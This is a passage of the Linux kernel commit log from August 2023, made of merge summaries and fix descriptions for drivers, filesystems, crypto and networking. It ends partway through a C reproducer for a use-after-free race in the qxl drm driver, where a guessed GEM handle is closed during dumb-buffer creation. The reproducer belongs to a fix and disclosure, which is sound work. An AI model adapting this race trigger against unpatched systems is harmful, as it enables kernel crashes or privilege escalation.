Pull MMC fixes from Ulf Hansson:
 "MMC core:
   - Fix in_flight[issue_type] value error to properly manage requests

  MMC host:
   - wbsd: Fix double free in the probe error path
   - sunplus: Fix error path in probe
   - sdhci_f_sdh30: Fix order of function calls in sdhci_f_sdh30_remove"

* tag 'mmc-v6.5-rc1-2' of git://git.kernel.org/pub/scm/linux/kernel/git/ulfh/mmc:
  mmc: f-sdh30: fix order of function calls in sdhci_f_sdh30_remove
  mmc: sunplus: Fix error handling in spmmc_drv_probe()
  mmc: sunplus: fix return value check of mmc_add_host()
  mmc: wbsd: fix double mmc_free_host() in wbsd_init()
  mmc: block: Fix in_flight[issue_type] value error
2023-08-18 19:10:41 +02:00
Rik van Riel
f0362a2536 mm,ima,kexec,of: use memblock_free_late from ima_free_kexec_buffer
The code calling ima_free_kexec_buffer runs long after the memblock
allocator has already been torn down, potentially resulting in a use
after free in memblock_isolate_range.

With KASAN or KFENCE, this use after free will result in a BUG
from the idle task, and a subsequent kernel panic.

Switch ima_free_kexec_buffer over to memblock_free_late to avoid
that issue.

Fixes: fee3ff99bc ("powerpc: Move arch independent ima kexec functions to drivers/of/kexec.c")
Cc: stable@kernel.org
Signed-off-by: Rik van Riel <riel@surriel.com>
Suggested-by: Mike Rappoport <rppt@kernel.org>
Link: https://lore.kernel.org/r/20230817135759.0888e5ef@imladris.surriel.com
Signed-off-by: Rob Herring <robh@kernel.org>
2023-08-18 11:47:45 -05:00
Linus Torvalds
f33fd7eb20 Some pin control fixes for v6.5, fixes two issues with the
Qualcomm SA8775P platform:
 
 - Some minor device tree binding flunky that is nice to iron
   out but more importantly:
 
 - Support the increased interrupt targets mask from 3 to 4
   bits, making interrupts with higher (hardware) numbers
   work.
 -----BEGIN PGP SIGNATURE-----
 
 iQIzBAABCgAdFiEElDRnuGcz/wPCXQWMQRCzN7AZXXMFAmTfJLYACgkQQRCzN7AZ
 XXNFOhAAtkMQZ8bV8DJZbB30aim6jDn/2fmI1NywnNdkfpI5FUvRHr+z4I2FNwUJ
 rNs1l9aTzxZGOcl/iqI2sJNqr7G+mRrnQZVcEypgtuwteXefSm5FWPQypiIhsG15
 0aoF0Ohe2jDf2kl74g67tUc6LJBGcjK4SW8CJUUv9LkjT16BkAnnAttUQch6qKBS
 8Txmv/d4XOuuqoSW3yMGfr8NHUmCj+/yNEOso9KiB9R/aHsOjvol1ZLpXlQgQmSG
 LAzhgcHO+vN4lb8o7n5T3r83YHCUnkB5qy1tTAQWe+jCRgWJRx1x7BHlevJZmshq
 +GPd6+dYMHGacFq5p22KsvB2Gk1rELGa6iPod6eFJ/9iPuvALgbFOoLh51q7OZM6
 5NgJDMwLQuqiDGTovdH3GprdabN3iS99F9eV8MXvZInq6coS7hYH0cTLiz7848rE
 tdC0q4+nN/+M+BrB5F8h02QByAHJ7Tn4L8NOxuQM/LAUYXfZDPdrqeSctY4tvfQL
 wgZpCy4942LIK68Hszii9VgpAfffJ21j+OCdso1pnpFepB0kuW/rUBW9GSAxAH+s
 0inhegO367JfrIKJDWtepb5xBDf5iIK5nvRtoB0eQWUfm6WqhDHgdUMpIXT70Nhi
 C0JeElpgp061qidWJRWWpQ1n8iYIPZf7sMyQvxbFWfHxIUcqRmQ=
 =Rn8a
 -----END PGP SIGNATURE-----

Merge tag 'pinctrl-v6.5-3' of git://git.kernel.org/pub/scm/linux/kernel/git/linusw/linux-pinctrl

Pull pin control fixes from Linus Walleij:
 "Fixes two issues with the Qualcomm SA8775P platform:

   - Some minor device tree binding flunky that is nice to iron out but
     more importantly:

   - Support the increased interrupt targets mask from 3 to 4 bits,
     making interrupts with higher (hardware) numbers work"

* tag 'pinctrl-v6.5-3' of git://git.kernel.org/pub/scm/linux/kernel/git/linusw/linux-pinctrl:
  pinctrl: qcom: Add intr_target_width field to support increased number of interrupt targets
  dt-bindings: pinctrl: qcom,sa8775p-tlmm: add gpio function constant
2023-08-18 18:37:40 +02:00
Linus Torvalds
80706f5529 ARM: SoC fixes for 6.5, part 3
As usual, mostly DT fixes for the major Arm platforms from Qualcomm and
 NXP, plus a bit for Rockchips and others:
 
 The qualcomm fixes mainly deal with their higher-end arm64 devices trees,
 fixing issues in L3 interconnect, crypto, thermal, UFS and a regression
 for the DSI phy.
 
 NXP i.MX has two correctness fixes for the 64-bit chips, dealing with
 the imx93 "anatop" module and the CSI interface. On the 32-bit side,
 there are functional fixes for RTC, display and SD card intefaces.
 
 Rockchip fixes are for wifi support on certain boards, a eMMC stability
 and DT build warnings.
 
 On TI OMAP, a regulator is described in DT to avoid problems with the
 ethernet phy initialization.
 
 The code changes include a missing MMIO serialization on OMAP, plus a
 few minor fixes on ASpeed and AMD/Zynq chips.
 -----BEGIN PGP SIGNATURE-----
 
 iQIzBAABCgAdFiEEiK/NIGsWEZVxh/FrYKtH/8kJUicFAmTe2VcACgkQYKtH/8kJ
 Uid+qxAAkNF+0roAULDQ9YCg8nnv9l6VN4AGu4K7PA/C8rouW8FbWmpc85xTBV9a
 rSm2AwdZEeHMb5S1hpdgu28MA4f3ja6IYIYSCjob4nE1mfgpVVwfxE6AXjUKApBp
 y6JN/jK/9W30JDLiReOFcsGNkM5Yqj80XKCBf+6/XLUfSWm90xgvXMFFte2p+AsV
 Qb4OInSIT06CtbkZ/DMJx9fFXPeB/lig5joLeuU7eChCXVF+GwcgRzBIueHvH4VS
 FbAEnprhlfDHfj4zvZAFKTXYhLDLCkWwxOHilGxauXykWhGP/4XY0qc6z1tk7y+5
 r8SPRgEAX4D6D4PwvloxhTJ5WnyqIzk6cS+8WYxMiheurzDGVnoofYp+dWR5CNMj
 2STXGzX7ZFkxIRZ3M7d8qz7GpzHsTnmQfg8SH4NiYsg/NptyfPLqdRPjYt1vhu+i
 zfVIA2tWmRGFDZbyTgFBpBoOz4EyBEyo31r/e2e8D5B7R9/7xC3rJS7wtjX5KWdV
 J6APuPKSmeag44gij7dK5vFtOI898FGkUiHEe3U0nUzNolWEogce1r6r1mdNdQsL
 HBUeTGI6CAElsX+WSpW0mYS1uLaDXz56fHj5Bm/681PobS69tk7qOv6WdOvyNpNZ
 7xtBwfOKDYmNAt5QYEIIAITJ1lm4nQoPdAjsaLeL91/1Sa5M770=
 =QlRp
 -----END PGP SIGNATURE-----

Merge tag 'soc-fixes-6.5-3' of git://git.kernel.org/pub/scm/linux/kernel/git/soc/soc

Pull ARM SoC fixes from Arnd Bergmann:
 "As usual, mostly DT fixes for the major Arm platforms from Qualcomm
  and NXP, plus a bit for Rockchips and others:

  The qualcomm fixes mainly deal with their higher-end arm64 devices
  trees, fixing issues in L3 interconnect, crypto, thermal, UFS and a
  regression for the DSI phy.

  NXP i.MX has two correctness fixes for the 64-bit chips, dealing with
  the imx93 "anatop" module and the CSI interface. On the 32-bit side,
  there are functional fixes for RTC, display and SD card intefaces.

  Rockchip fixes are for wifi support on certain boards, a eMMC
  stability and DT build warnings.

  On TI OMAP, a regulator is described in DT to avoid problems with the
  ethernet phy initialization.

  The code changes include a missing MMIO serialization on OMAP, plus a
  few minor fixes on ASpeed and AMD/Zynq chips"

* tag 'soc-fixes-6.5-3' of git://git.kernel.org/pub/scm/linux/kernel/git/soc/soc: (30 commits)
  ARM: dts: am335x-bone-common: Add vcc-supply for on-board eeprom
  ARM: dts: am335x-bone-common: Add GPIO PHY reset on revision C3 board
  soc: aspeed: socinfo: Add kfree for kstrdup
  soc: aspeed: uart-routing: Use __sysfs_match_string
  ARM: dts: integrator: fix PCI bus dtc warnings
  arm64: dts: imx93: Fix anatop node size
  arm64: dts: qcom: sc7180: Fix DSI0_PHY reg-names
  ARM: dts: imx: Set default tuning step for imx6sx usdhc
  arm64: dts: imx8mm: Drop CSI1 PHY reference clock configuration
  arm64: dts: imx8mn: Drop CSI1 PHY reference clock configuration
  ARM: dts: imx: Set default tuning step for imx7d usdhc
  ARM: dts: imx6: phytec: fix RTC interrupt level
  ARM: dts: imx6sx: Remove LDB endpoint
  arm64: dts: rockchip: Fix Wifi/Bluetooth on ROCK Pi 4 boards
  ARM: zynq: Explicitly include correct DT includes
  arm64: dts: qcom: sa8775p-ride: Update L4C parameters
  arm64: dts: rockchip: minor whitespace cleanup around '='
  arm64: dts: rockchip: Disable HS400 for eMMC on ROCK 4C+
  arm64: dts: rockchip: Disable HS400 for eMMC on ROCK Pi 4
  arm64: dts: rockchip: add missing space before { on indiedroid nova
  ...
2023-08-18 18:24:41 +02:00
Linus Torvalds
eabeef9054 asm-generic: regression fix for 6.5
Just one partial revert for a commit from the merge window
 that caused annoying behavior when building old kernels on
 arm64 hosts.
 -----BEGIN PGP SIGNATURE-----
 
 iQIzBAABCgAdFiEEiK/NIGsWEZVxh/FrYKtH/8kJUicFAmTe0Z8ACgkQYKtH/8kJ
 UidZGQ/9GFtIHh9QK6XPlAlx3oC6HdFUrOqDwoueNd4sFk9nNAuW+Z/a0YX8DtnQ
 /SrJPiCtoPPNCMNlxk7ZDx+ra0Tu+iC7rAvRnogKSV8qB35jNLIqhEde2opCa2Dx
 sfmvtP0hr5c+b8UP9IN2U11WvJhv1yjldHtCKAjSf9zMtwPQjQvAIx1kzSlC57kE
 zjsKVTB3yXUddhYGR7639RT7/1K25BVcG6kfKIEN/uPm+M/ljk58EJhUhSeEEfBf
 NmtlhxWzJBySOTk5mjEVUsTAPrAckPI3Vh4sf0qd4rXe4Q+XX9Jvur9kPOoF8lQF
 GO+WXrmooaEir3+1+w4PB9xXgZD26Iz018xdhcigLgEGefieM1JpvwJa8NarK8UK
 iLg2+sBvCAJPJQ44E4r1hWf8ZFolEhwzg703/fGIjDPMQnhHNay4i73NyCw4ii2c
 F+iCFhea5AKz+d5qQuaZmg7klY/4cBIKDVY/EsO4lmK0187eq3zZKJSMLD21+NLy
 kr63OAV8yXbduLsIOjvR3KrbSvMq+9vasEX4zUGlzA+VR1l+MqtwJI13EPyqhubJ
 kQQi6PUe/353ECdzwk5IAqMbGP7qhkOuv89+Ff9mPTlKAwDPwdZjbnsz5I5peskB
 zVBO366Z0w3o2ENv9i4UEa+TtaCMIbLWdXJxPufwoqPHX3v7nUM=
 =tTzL
 -----END PGP SIGNATURE-----

Merge tag 'asm-generic-fix-6.5' of git://git.kernel.org/pub/scm/linux/kernel/git/arnd/asm-generic

Pull asm-generic regression fix from Arnd Bergmann:
 "Just one partial revert for a commit from the merge window that caused
  annoying behavior when building old kernels on arm64 hosts"

* tag 'asm-generic-fix-6.5' of git://git.kernel.org/pub/scm/linux/kernel/git/arnd/asm-generic:
  asm-generic: partially revert "Unify uapi bitsperlong.h for arm64, riscv and loongarch"
2023-08-18 18:13:36 +02:00
Josef Bacik
c962098ca4 btrfs: fix incorrect splitting in btrfs_drop_extent_map_range
In production we were seeing a variety of WARN_ON()'s in the extent_map
code, specifically in btrfs_drop_extent_map_range() when we have to call
add_extent_mapping() for our second split.

Consider the following extent map layout

	PINNED
	[0 16K)  [32K, 48K)

and then we call btrfs_drop_extent_map_range for [0, 36K), with
skip_pinned == true.  The initial loop will have

	start = 0
	end = 36K
	len = 36K

we will find the [0, 16k) extent, but since we are pinned we will skip
it, which has this code

	start = em_end;
	if (end != (u64)-1)
		len = start + len - em_end;

em_end here is 16K, so now the values are

	start = 16K
	len = 16K + 36K - 16K = 36K

len should instead be 20K.  This is a problem when we find the next
extent at [32K, 48K), we need to split this extent to leave [36K, 48k),
however the code for the split looks like this

	split->start = start + len;
	split->len = em_end - (start + len);

In this case we have

	em_end = 48K
	split->start = 16K + 36K       // this should be 16K + 20K
	split->len = 48K - (16K + 36K) // this overflows as 16K + 36K is 52K

and now we have an invalid extent_map in the tree that potentially
overlaps other entries in the extent map.  Even in the non-overlapping
case we will have split->start set improperly, which will cause problems
with any block related calculations.

We don't actually need len in this loop, we can simply use end as our
end point, and only adjust start up when we find a pinned extent we need
to skip.

Adjust the logic to do this, which keeps us from inserting an invalid
extent map.

We only skip_pinned in the relocation case, so this is relatively rare,
except in the case where you are running relocation a lot, which can
happen with auto relocation on.

Fixes: 55ef689900 ("Btrfs: Fix btrfs_drop_extent_cache for skip pinned case")
CC: stable@vger.kernel.org # 4.14+
Reviewed-by: Filipe Manana <fdmanana@suse.com>
Signed-off-by: Josef Bacik <josef@toxicpanda.com>
Signed-off-by: David Sterba <dsterba@suse.com>
2023-08-18 14:38:10 +02:00
Biju Das
8fcc1c40b7 pinctrl: renesas: rza2: Add lock around pinctrl_generic{{add,remove}_group,{add,remove}_function}
The pinctrl group and function creation/remove calls expect
caller to take care of locking. Add lock around these functions.

Fixes: b59d0e7827 ("pinctrl: Add RZ/A2 pin and gpio controller")
Signed-off-by: Biju Das <biju.das.jz@bp.renesas.com>
Reviewed-by: Geert Uytterhoeven <geert+renesas@glider.be>
Link: https://lore.kernel.org/r/20230815131558.33787-4-biju.das.jz@bp.renesas.com
Signed-off-by: Geert Uytterhoeven <geert+renesas@glider.be>
2023-08-18 13:01:41 +02:00
Biju Das
f982b9d57e pinctrl: renesas: rzv2m: Fix NULL pointer dereference in rzv2m_dt_subnode_to_map()
Fix the below random NULL pointer crash during boot by serializing
pinctrl group and function creation/remove calls in
rzv2m_dt_subnode_to_map() with mutex lock.

Crash logs:
    pc : __pi_strcmp+0x20/0x140
    lr : pinmux_func_name_to_selector+0x68/0xa4
    Call trace:
    __pi_strcmp+0x20/0x140
    pinmux_generic_add_function+0x34/0xcc
    rzv2m_dt_subnode_to_map+0x2e4/0x418
    rzv2m_dt_node_to_map+0x15c/0x18c
    pinctrl_dt_to_map+0x218/0x37c
    create_pinctrl+0x70/0x3d8

While at it, add a comment for lock.

Fixes: 92a9b82525 ("pinctrl: renesas: Add RZ/V2M pin and gpio controller driver")
Signed-off-by: Biju Das <biju.das.jz@bp.renesas.com>
Reviewed-by: Geert Uytterhoeven <geert+renesas@glider.be>
Link: https://lore.kernel.org/r/20230815131558.33787-3-biju.das.jz@bp.renesas.com
Signed-off-by: Geert Uytterhoeven <geert+renesas@glider.be>
2023-08-18 13:01:41 +02:00
Biju Das
661efa2284 pinctrl: renesas: rzg2l: Fix NULL pointer dereference in rzg2l_dt_subnode_to_map()
Fix the below random NULL pointer crash during boot by serializing
pinctrl group and function creation/remove calls in
rzg2l_dt_subnode_to_map() with mutex lock.

Crash log:
    pc : __pi_strcmp+0x20/0x140
    lr : pinmux_func_name_to_selector+0x68/0xa4
    Call trace:
    __pi_strcmp+0x20/0x140
    pinmux_generic_add_function+0x34/0xcc
    rzg2l_dt_subnode_to_map+0x314/0x44c
    rzg2l_dt_node_to_map+0x164/0x194
    pinctrl_dt_to_map+0x218/0x37c
    create_pinctrl+0x70/0x3d8

While at it, add comments for bitmap_lock and lock.

Fixes: c4c4637eb5 ("pinctrl: renesas: Add RZ/G2L pin and gpio controller driver")
Tested-by: Chris Paterson <Chris.Paterson2@renesas.com>
Signed-off-by: Biju Das <biju.das.jz@bp.renesas.com>
Reviewed-by: Geert Uytterhoeven <geert+renesas@glider.be>
Link: https://lore.kernel.org/r/20230815131558.33787-2-biju.das.jz@bp.renesas.com
Signed-off-by: Geert Uytterhoeven <geert+renesas@glider.be>
2023-08-18 13:01:41 +02:00
Borislav Petkov (AMD)
6405b72e8d x86/srso: Correct the mitigation status when SMT is disabled
Specify how is SRSO mitigated when SMT is disabled. Also, correct the
SMT check for that.

Fixes: e9fbc47b81 ("x86/srso: Disable the mitigation on unaffected configurations")
Suggested-by: Josh Poimboeuf <jpoimboe@kernel.org>
Signed-off-by: Borislav Petkov (AMD) <bp@alien8.de>
Acked-by: Josh Poimboeuf <jpoimboe@kernel.org>
Link: https://lore.kernel.org/r/20230814200813.p5czl47zssuej7nv@treble
2023-08-18 12:43:10 +02:00
Pavel Skripkin
080aa61e37 crypto: fix uninit-value in af_alg_free_resources
Syzbot was able to trigger use of uninitialized memory in
af_alg_free_resources.

Bug is caused by missing initialization of rsgl->sgl.need_unpin before
adding to rsgl_list. Then in case of extract_iter_to_sg() failure, rsgl
is left with uninitialized need_unpin which is read during clean up

BUG: KMSAN: uninit-value in af_alg_free_sg crypto/af_alg.c:545 [inline]
BUG: KMSAN: uninit-value in af_alg_free_areq_sgls crypto/af_alg.c:778 [inline]
BUG: KMSAN: uninit-value in af_alg_free_resources+0x3d1/0xf60 crypto/af_alg.c:1117
 af_alg_free_sg crypto/af_alg.c:545 [inline]
 af_alg_free_areq_sgls crypto/af_alg.c:778 [inline]
 af_alg_free_resources+0x3d1/0xf60 crypto/af_alg.c:1117
 _skcipher_recvmsg crypto/algif_skcipher.c:144 [inline]
...

Uninit was created at:
 slab_post_alloc_hook+0x12f/0xb70 mm/slab.h:767
 slab_alloc_node mm/slub.c:3470 [inline]
 __kmem_cache_alloc_node+0x536/0x8d0 mm/slub.c:3509
 __do_kmalloc_node mm/slab_common.c:984 [inline]
 __kmalloc+0x121/0x3c0 mm/slab_common.c:998
 kmalloc include/linux/slab.h:586 [inline]
 sock_kmalloc+0x128/0x1c0 net/core/sock.c:2683
 af_alg_alloc_areq+0x41/0x2a0 crypto/af_alg.c:1188
 _skcipher_recvmsg crypto/algif_skcipher.c:71 [inline]

Fixes: c1abe6f570 ("crypto: af_alg: Use extract_iter_to_sg() to create scatterlists")
Reported-and-tested-by: syzbot+cba21d50095623218389@syzkaller.appspotmail.com
Closes: https://syzkaller.appspot.com/bug?extid=cba21d50095623218389
Signed-off-by: Pavel Skripkin <paskripkin@gmail.com>
Signed-off-by: Herbert Xu <herbert@gondor.apana.org.au>
2023-08-18 18:30:09 +08:00
Herbert Xu
83874b8e97 Revert "crypto: caam - adjust RNG timing to support more devices"
This reverts commit ef492d0803.

This patch breaks the RNG on i.MX8MM.

Reported-by: Bastian Krause <bst@pengutronix.de>
Link: https://lore.kernel.org/all/e1f3f073-9d5e-1bae-f4f8-08dc48adad62@pengutronix.de/
Signed-off-by: Herbert Xu <herbert@gondor.apana.org.au>
2023-08-18 16:47:02 +08:00
Frieder Schrempf
20c827683d drm: bridge: samsung-dsim: Fix init during host transfer
In case the downstream bridge or panel uses DSI transfers before the
DSI host was actually initialized through samsung_dsim_atomic_enable()
which clears the stop state (LP11) mode, all transfers will fail.

This happens with downstream bridges that are controlled by DSI
commands such as the tc358762.

As documented in [1] DSI hosts are expected to allow transfers
outside the normal bridge enable/disable flow.

To fix this make sure that stop state is cleared in
samsung_dsim_host_transfer() which restores the previous
behavior.

We also factor out the common code to enable/disable stop state
to samsung_dsim_set_stop_state().

[1] https://docs.kernel.org/gpu/drm-kms-helpers.html#mipi-dsi-bridge-operation

Fixes: 0c14d31306 ("drm: bridge: samsung-dsim: Fix i.MX8M enable flow to meet spec")
Reported-by: Tim Harvey <tharvey@gateworks.com>
Signed-off-by: Frieder Schrempf <frieder.schrempf@kontron.de>
Reviewed-by: Neil Armstrong <neil.armstrong@linaro.org>
Tested-by: Tim Harvey <tharvey@gateworks.com>
Signed-off-by: Neil Armstrong <neil.armstrong@linaro.org>
Link: https://patchwork.freedesktop.org/patch/msgid/20230724151640.555490-1-frieder@fris.de
2023-08-18 10:38:36 +02:00
Linus Torvalds
0e8860d212 Including fixes from ipsec and netfilter.
No known outstanding regressions.
 
 Fixes to fixes:
 
  - virtio-net: set queues after driver_ok, avoid a potential race
    added by recent fix
 
  - Revert "vlan: Fix VLAN 0 memory leak", it may lead to a warning
    when VLAN 0 is registered explicitly
 
  - nf_tables:
    - fix false-positive lockdep splat in recent fixes
    - don't fail inserts if duplicate has expired (fix test failures)
    - fix races between garbage collection and netns dismantle
 
 Current release - new code bugs:
 
  - mlx5: Fix mlx5_cmd_update_root_ft() error flow
 
 Previous releases - regressions:
 
  - phy: fix IRQ-based wake-on-lan over hibernate / power off
 
 Previous releases - always broken:
 
  - sock: fix misuse of sk_under_memory_pressure() preventing system
    from exiting global TCP memory pressure if a single cgroup is under
    pressure
 
  - fix the RTO timer retransmitting skb every 1ms if linear option
    is enabled
 
  - af_key: fix sadb_x_filter validation, amment netlink policy
 
  - ipsec: fix slab-use-after-free in decode_session6()
 
  - macb: in ZynqMP resume always configure PS GTR for non-wakeup source
 
 Misc:
 
  - netfilter: set default timeout to 3 secs for sctp shutdown send and
    recv state (from 300ms), align with protocol timers
 
 Signed-off-by: Jakub Kicinski <kuba@kernel.org>
 -----BEGIN PGP SIGNATURE-----
 
 iQIzBAABCAAdFiEE6jPA+I1ugmIBA4hXMUZtbf5SIrsFAmTemA4ACgkQMUZtbf5S
 IrtCThAAj+t35QM5BgGZowmrx9U4yF+kacDkdPztxlT8a/b+famrTtnZJ8USW+PF
 VCk3Eu8JXheuyAOMArHyM84/crS6wim6mzGcXaucusA3981PFzoqdgCLLf9emAJ2
 j9vzKrnHBtdd5fj8Exwq70KN4CzXyrzRgqwr2EXBK9lH59HjX0+J7o+trbDxNmFK
 RZJE2oDCqf939iRGG3PhJryKYBmrQaMtdonNpSU5PiiRT0HnVYcEtdWcOXK7d53D
 onpoaPdawcsqsns5c5Qj01E1OdyM8X54BEGkl/S4FmSw5jF9Bp6btmTcxYYtdb7E
 M3CeYROZ0Kt8KcKKje/o1AzdGqWq8Hnxfwy+2WulZAHMucshg0JPm6Ev74WRondw
 NGYriKJSdORSO8idK9K/i7pnjZXYr9gU50lpPUFU+QzSdd+zv+U11arjAodwI9Wi
 pW+dFi3UR7J01LidaxclvHmWnZ7d5sSzE2khpqb0xd0+PagRGesl8qnKyoDJNS1P
 IHsOrRh9aXLzEZjud/rVG+sUobQvc1oiHW+hvbJ04GLKoli9U5poGT2fcaa4O67M
 T7JcN5oGDF+PIHJKgTEN7pfX2epY33gmofKUhbt/OPOqnvZOVbTu7/ojjuJZ8Lc5
 SF8AvTe+lECcX8Htjq30PoVfai+FT6AhnZzK0H9K4HMfUB9O32Q=
 =Ze13
 -----END PGP SIGNATURE-----

Merge tag 'net-6.5-rc7' of git://git.kernel.org/pub/scm/linux/kernel/git/netdev/net

Pull networking fixes from Jakub Kicinski:
 "Including fixes from ipsec and netfilter.

  No known outstanding regressions.

  Fixes to fixes:

   - virtio-net: set queues after driver_ok, avoid a potential race
     added by recent fix

   - Revert "vlan: Fix VLAN 0 memory leak", it may lead to a warning
     when VLAN 0 is registered explicitly

   - nf_tables:
      - fix false-positive lockdep splat in recent fixes
      - don't fail inserts if duplicate has expired (fix test failures)
      - fix races between garbage collection and netns dismantle

  Current release - new code bugs:

   - mlx5: Fix mlx5_cmd_update_root_ft() error flow

  Previous releases - regressions:

   - phy: fix IRQ-based wake-on-lan over hibernate / power off

  Previous releases - always broken:

   - sock: fix misuse of sk_under_memory_pressure() preventing system
     from exiting global TCP memory pressure if a single cgroup is under
     pressure

   - fix the RTO timer retransmitting skb every 1ms if linear option is
     enabled

   - af_key: fix sadb_x_filter validation, amment netlink policy

   - ipsec: fix slab-use-after-free in decode_session6()

   - macb: in ZynqMP resume always configure PS GTR for non-wakeup
     source

  Misc:

   - netfilter: set default timeout to 3 secs for sctp shutdown send and
     recv state (from 300ms), align with protocol timers"

* tag 'net-6.5-rc7' of git://git.kernel.org/pub/scm/linux/kernel/git/netdev/net: (49 commits)
  ice: Block switchdev mode when ADQ is active and vice versa
  qede: fix firmware halt over suspend and resume
  net: do not allow gso_size to be set to GSO_BY_FRAGS
  sock: Fix misuse of sk_under_memory_pressure()
  sfc: don't fail probe if MAE/TC setup fails
  sfc: don't unregister flow_indr if it was never registered
  net: dsa: mv88e6xxx: Wait for EEPROM done before HW reset
  net/mlx5: Fix mlx5_cmd_update_root_ft() error flow
  net/mlx5e: XDP, Fix fifo overrun on XDP_REDIRECT
  i40e: fix misleading debug logs
  iavf: fix FDIR rule fields masks validation
  ipv6: fix indentation of a config attribute
  mailmap: add entries for Simon Horman
  broadcom: b44: Use b44_writephy() return value
  net: openvswitch: reject negative ifindex
  team: Fix incorrect deletion of ETH_P_8021AD protocol vid from slaves
  net: phy: broadcom: stub c45 read/write for 54810
  netfilter: nft_dynset: disallow object maps
  netfilter: nf_tables: GC transaction race with netns dismantle
  netfilter: nf_tables: fix GC transaction races with netns and netlink event exit path
  ...
2023-08-18 06:52:23 +02:00
Linus Torvalds
1ada9c0740 drm fixes for 6.5-rc7
edid:
 - revert mode parsing fix that had side effects.
 
 i915:
 - Fix the flow for ignoring GuC SLPC efficient frequency selection
 - Fix SDVO panel_type initialization
 - Fix display probe for IVB Q and IVB D GT2 server
 
 nouveau:
 - fix use-after-free in connector code
 
 qaic:
 - integer overflow check fix
 - fix slicing memory leak
 
 panel:
 - fix JDI LT070ME05000 probing
 - fix AUO G121EAN01 timings
 
 amdgpu:
 - SMU 13.x fixes
 - Fix mcbp parameter for gfx9
 - SMU 11.x fixes
 - Temporary fix for large numbers of XCP partitions
 - S0ix fixes
 - DCN 2.0 fix
 
 qxl:
 - fix use after free race in dumb object allocation
 -----BEGIN PGP SIGNATURE-----
 
 iQIzBAABCAAdFiEEEKbZHaGwW9KfbeusDHTzWXnEhr4FAmTekjgACgkQDHTzWXnE
 hr7Dtw/+Lmf8Puh9RIgqLFA6sThkRI3jaj5mr/0arFzCXhQKeVUFhDgbVMndQX2B
 JajuMYY/tz1ok5dDgUbFkY7P2v+JrDMEpADGbdv1F9OjzimBimydD0fyfY92NTPL
 LrugeBOQrgw2BQkY12GW010ThrzEYvapF0NTAgMXY10xsVfDkT1OkUS45TrM3KM8
 rX7Vwkd48DD+N+c6wjvPP6cIKQHxktOrziCmn2ggsklGUD0anIyVpZ5mk+YC2HV+
 fQKt8FihyWzdqRUEjpDn1p4HuLiaKYOBxy1Kwz8jJooqf9dA+SGA+AzXYP3wfUKs
 SmX7OpwWB22yhOA027oFm4y696EVg7Al4BqyblohWwwpY/hpTMxSReNQAAogTc13
 TFQ1QqDM84QDzaLG58jydxh/6gmvLuCZt4Wy/Ho+qHw+n0RGiqt29DkWcGfx0ETu
 a/t5NANMO+lInmDELi8ns/ZL3m9+uXvl3VDA49VhMk1mZv1Wt+UKz8wJg83tz9SQ
 7k9jpEntGGgqarF2X5hwIkTeZZtsnY3bdHaOmr2ed6OJ6Gq64r7gSfVaYx/EL5IN
 qF6s8Kbow9Y/5LGIkNry0KIrv6C6+XMQSYH0+F0TaeZFh55FPdPakJvxj8lkwGRT
 gWEhL1bKYeEHk7GgshztCgJl1lc47Dcbg4A7rVAH/Iyqgkqn/Hc=
 =P1rE
 -----END PGP SIGNATURE-----

Merge tag 'drm-fixes-2023-08-18-1' of git://anongit.freedesktop.org/drm/drm

Pull drm fixes from Dave Airlie:
 "Regular enough week, mostly the usual amdgpu and i915 fixes.  Also
  qaic, nouveau, qxl and a revert for an EDID patch that had some side
  effects, along with a couple of panel fixes.

  edid:
   - revert mode parsing fix that had side effects.

  i915:
   - Fix the flow for ignoring GuC SLPC efficient frequency selection
   - Fix SDVO panel_type initialization
   - Fix display probe for IVB Q and IVB D GT2 server

  nouveau:
   - fix use-after-free in connector code

  qaic:
   - integer overflow check fix
   - fix slicing memory leak

  panel:
   - fix JDI LT070ME05000 probing
   - fix AUO G121EAN01 timings

  amdgpu:
   - SMU 13.x fixes
   - Fix mcbp parameter for gfx9
   - SMU 11.x fixes
   - Temporary fix for large numbers of XCP partitions
   - S0ix fixes
   - DCN 2.0 fix

  qxl:
   - fix use after free race in dumb object allocation"

* tag 'drm-fixes-2023-08-18-1' of git://anongit.freedesktop.org/drm/drm:
  drm/qxl: fix UAF on handle creation
  Revert "drm/edid: Fix csync detailed mode parsing"
  drm/nouveau/disp: fix use-after-free in error handling of nouveau_connector_create
  Revert "Revert "drm/amdgpu/display: change pipe policy for DCN 2.0""
  drm/amd: flush any delayed gfxoff on suspend entry
  drm/amdgpu: skip fence GFX interrupts disable/enable for S0ix
  drm/amdgpu: skip xcp drm device allocation when out of drm resource
  drm/amd/pm: Update pci link width for smu v13.0.6
  drm/amd/pm: Fix temperature unit of SMU v13.0.6
  drm/amdgpu/pm: fix throttle_status for other than MP1 11.0.7
  drm/amdgpu: disable mcbp if parameter zero is set
  drm/amd/pm: disallow the fan setting if there is no fan on smu 13.0.0
  accel/qaic: Clean up integer overflow checking in map_user_pages()
  accel/qaic: Fix slicing memory leak
  drm/i915: fix display probe for IVB Q and IVB D GT2 server
  drm/i915/sdvo: fix panel_type initialization
  drm/i915/guc/slpc: Restore efficient freq earlier
  drm/panel: simple: Fix AUO G121EAN01 panel timings according to the docs
  drm/panel: JDI LT070ME05000 simplify with dev_err_probe()
2023-08-18 06:37:34 +02:00
Jakub Kicinski
820a38d8f2 Merge branch '40GbE' of git://git.kernel.org/pub/scm/linux/kernel/git/tnguy/net-queue
Tony Nguyen says:

====================
Intel Wired LAN Driver Updates 2023-08-16 (iavf, i40e)

This series contains updates to iavf and i40e drivers.

Piotr adds checks for unsupported Flow Director rules on iavf.

Andrii replaces incorrect 'write' messaging on read operations for i40e.

* '40GbE' of git://git.kernel.org/pub/scm/linux/kernel/git/tnguy/net-queue:
  i40e: fix misleading debug logs
  iavf: fix FDIR rule fields masks validation
====================

Link: https://lore.kernel.org/r/20230816193308.1307535-1-anthony.l.nguyen@intel.com
Signed-off-by: Jakub Kicinski <kuba@kernel.org>
2023-08-17 14:35:34 -07:00
Wander Lairson Costa
c611589b42 drm/qxl: fix UAF on handle creation
qxl_mode_dumb_create() dereferences the qobj returned by
qxl_gem_object_create_with_handle(), but the handle is the only one
holding a reference to it.

A potential attacker could guess the returned handle value and closes it
between the return of qxl_gem_object_create_with_handle() and the qobj
usage, triggering a use-after-free scenario.

Reproducer:

int dri_fd =-1;
struct drm_mode_create_dumb arg = {0};

void gem_close(int handle);

void* trigger(void* ptr)
{
	int ret;
	arg.width = arg.height = 0x20;
	arg.bpp = 32;
	ret = ioctl(dri_fd, DRM_IOCTL_MODE_CREATE_DUMB, &arg);
	if(ret)
	{
